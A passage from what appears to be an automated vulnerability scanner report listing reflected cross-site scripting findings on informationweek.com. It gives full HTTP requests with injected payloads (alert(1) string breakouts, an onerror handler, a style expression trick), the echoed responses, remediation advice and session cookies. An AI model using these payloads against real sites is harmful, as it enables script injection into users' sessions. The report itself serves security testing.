This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/Security/Attacks-Breachesc7429"><a%20b%3dc>eb3a5f3be23/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:13 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:13 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30539
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breachesc7429"><a b=c>eb3a5f3be23/the-com;kvarticleid=;kvauthor=;loc=300;grp=321639324" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b2b9"><img%20src%3da%20onerror%3dalert(1)>ba735ca501f was submitted in the REST URL parameter 2. This input was echoed as 7b2b9"><img src=a onerror=alert(1)>ba735ca501f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /whitepaper/Security7b2b9"><img%20src%3da%20onerror%3dalert(1)>ba735ca501f/Attacks-Breaches/what-is-security-as-a-service-and-should-smbs-co-wp1289497389050 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:11 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:11 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30631
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security7b2b9"><img src=a onerror=alert(1)>ba735ca501f/Att;kvarticleid=;kvauthor=;loc=300;grp=663964713" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83686</script>a41fb08e1de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security83686</script>a41fb08e1de/Attacks-Breaches/what-is-security-as-a-service-and-should-smbs-co-wp1289497389050 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:15 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:15 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30533
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security83686</script>a41fb08e1de/Attacks-Breaches/what-is;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=587362074;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d82a'-alert(1)-'4630ad5d364 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Attacks-Breaches4d82a'-alert(1)-'4630ad5d364/what-is-security-as-a-service-and-should-smbs-co-wp1289497389050 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:25 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:25 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30525
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... +'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breaches4d82a'-alert(1)-'4630ad5d364/what;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=420611034;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b692"><a>c712eeac21e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/Security/Attacks-Breaches4b692"><a>c712eeac21e/what-is-security-as-a-service-and-should-smbs-co-wp1289497389050 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:17 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:17 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30527
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breaches4b692"><a>c712eeac21e/what-is-sec;kvarticleid=;kvauthor=;loc=300;grp=973072847" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d67b</script><a%20b%3dc>ece4ff79bab was submitted in the REST URL parameter 4. This input was echoed as 2d67b</script><a b=c>ece4ff79bab in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Attacks-Breaches/2d67b</script><a%20b%3dc>ece4ff79bab HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:42 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:42 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30425
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... 'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breaches/2d67b</script><a b=c>ece4ff79bab;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=413231846;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d8fa"><a%20b%3dc>70051c02fe8 was submitted in the REST URL parameter 4. This input was echoed as 6d8fa"><a b=c>70051c02fe8 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/Security/Attacks-Breaches/6d8fa"><a%20b%3dc>70051c02fe8 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:29 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:29 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30327
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breaches/6d8fa"><a b=c>70051c02fe8;kvarticleid=;kvauthor=;loc=300;grp=175634076" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18fb6'-alert(1)-'219dcd9e8f3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Encryption/18fb6'-alert(1)-'219dcd9e8f3 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:14 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:14 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30265
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Encryption/18fb6'-alert(1)-'219dcd9e8f3;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=109257931;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f948"><a>a53d5ed524c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/Security/Encryption/1f948"><a>a53d5ed524c HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:07 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:07 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30183
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Encryption/1f948"><a>a53d5ed524c;kvarticleid=;kvauthor=;loc=300;grp=141614446" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4eb5'-alert(1)-'06f538ccbaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepapera4eb5'-alert(1)-'06f538ccbaa/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:01 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:01 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30346
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/whitepapera4eb5'-alert(1)-'06f538ccbaa/Security/Privacy/ac;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=902994912;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b4d5"%20style%3dx%3aexpression(alert(1))%2003ffb9b3c2 was submitted in the REST URL parameter 2. This input was echoed as 4b4d5" style=x:expression(alert(1)) 03ffb9b3c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /whitepaper/Security4b4d5"%20style%3dx%3aexpression(alert(1))%2003ffb9b3c2/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:10 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:10 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30601
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security4b4d5" style=x:expression(alert(1)) 03ffb9b3c2/Pri;kvarticleid=;kvauthor=;loc=300;grp=186630068" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57d84'-alert(1)-'e25124c95b4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Privacy/57d84'-alert(1)-'e25124c95b4 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:26 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:26 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30223
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Privacy/57d84'-alert(1)-'e25124c95b4;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=448044662;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79216"a%3d"b"619f2192eeb was submitted in the REST URL parameter 2. This input was echoed as 79216"a="b"619f2192eeb in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/79216"a%3d"b"619f2192eeb/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:18 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:18 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30509
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/79216"a="b"619f2192eeb/Privacy/business-driven-access-mana;kvarticleid=;kvauthor=;loc=300;grp=447075128" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d0d5'-alert(1)-'9aaa8d0ebc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/1d0d5'-alert(1)-'9aaa8d0ebc/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:22 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:22 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30508
